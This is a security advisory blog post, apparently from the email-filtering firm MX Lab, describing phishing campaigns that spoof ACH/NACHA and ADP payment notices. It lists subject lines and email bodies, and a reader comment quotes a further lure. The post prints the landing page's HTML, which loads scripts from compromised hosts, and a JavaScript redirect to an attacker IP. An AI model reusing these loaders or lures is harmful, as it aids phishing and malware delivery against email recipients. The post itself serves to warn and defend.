Email notification with subjects like “ACH transfer suspended” or “ADP Generated Message – Debit Draft” are a potential security risk


MX Lab, http://www.mxlab.eu, is intercepting new campaigns with a potential security risk based on obfuscated Javascript. We currently have two campaigns that are using the same techniques but the content of the emails is different.

ACH related messages

Possible subjects:

ACH cancellation report
ACH payment report
ACH rejection notice
ACH transaction declined
ACH transaction suspended
ACH transfer rejected
ACH transfer not accepted
ACH transfer suspende
…..

The email is send from “The Electronics Payment Association” with a spoofed emailaddress in the form of 52F54A1@domain.tld (random numbers and letters in capitals) in and has the following body:

The ACH payment ID: #ACH672038492554US, that had been sent from your banking account recently, was suspended by the recipient.

ACH rejection notice
Transaction ID: #ACH672038492554US
Details: please refer to the report below for more information
Transaction Report report_#ACH672038492554US.doc (Microsoft Word Document)

13450 Sunrise Valley Drive, Suite 100
Herndon, VA 20171
2012 NACHA – The Electronic Payments Association

ADP related messages

Possible subjects:

ADP Generated Message – Debit Draft
ADP Funding Notification – Debit Draft
ADP Urgent Notification – Debit Draft
Message from ADP – Your bank account will be debited
Message from ADP – Your Transaction Report
…..

The email is send from “ADPClientServices” with a spoofed emailaddress in the form of 9021ACB88@domain.tld in and has the following body:

Your Transaction Report(s) have been uploaded to the web site:

https://www.flexdirect.adp.com/client/login.aspx

Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).

Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.

Thank You,
ADP Benefit Services

Further analysis:

In both campaigns, the malicious URL leads to a web page that loads a Javascript:

<html>
<h1>WAIT·PLEASE</h1>
·<h3>Loading...</h3>
·<script·type="text/javascript"·src="http://caregraphic.be/vezZnbka/js.js"></script>
<script·type="text/javascript"·src="http://skolari.webd.pl/L5nxVF3g/js.js"></script>
<script·type="text/javascript"·src="http://kingdomitservices.com/mn9Re7En/js.js"></script>
</html>

The three Javascripts js.js contain the same code but it is included to obtain some redundancy. In some cases, the file or host is disabled and will not load. The file js.js contains the code:

document.location='hxxp://69.194.192.203/links/deep_recover-result.php';

At this time, it apperars that this page is empty. Our investgation with online HTML viewers and opening the web page directly shows us no content. But the technique used here is the same as in the previous campaigns with messages from ADP. It is possible that the URL will change or that the malicious code will appear at a later time.

MX Lab recommends therefore not to click on the embedded URLs in this type of messages.

One thought on “Email notification with subjects like “ACH transfer suspended” or “ADP Generated Message – Debit Draft” are a potential security risk

  1. The email I got today showed the following:
    Valued client:

    Gavin recently declined Transaction at your account. Instance No. 135501442.
    Instance Topic: 54RQ
    Incident Occasion: Download

    We at ADP achieve to create a personalized and client focused experience with every client interaction.
    Please overview operation issued by
    visiting the link below.

    Click this link – ADP Major Accounts Operations described above
    Best Wishes,
    Gavin Peterson
    Vice President of Customer Care Department ADP
    ADP Major Accounts

    ***Reminder***
    Please remember to complete your Semi-Annual Service Quality Survey!
    Our Goal is to ensure you are VERY SATISFIED with each interaction you have with our Service Associates and we ask that you consider your overall experience in the 6 months preceding your receipt of the survey. We strive to provide WORLD CLASS SERVICE and determine our success by your satisfaction with ADP’s services.
    from email: ADP Operation Status

Comments are closed.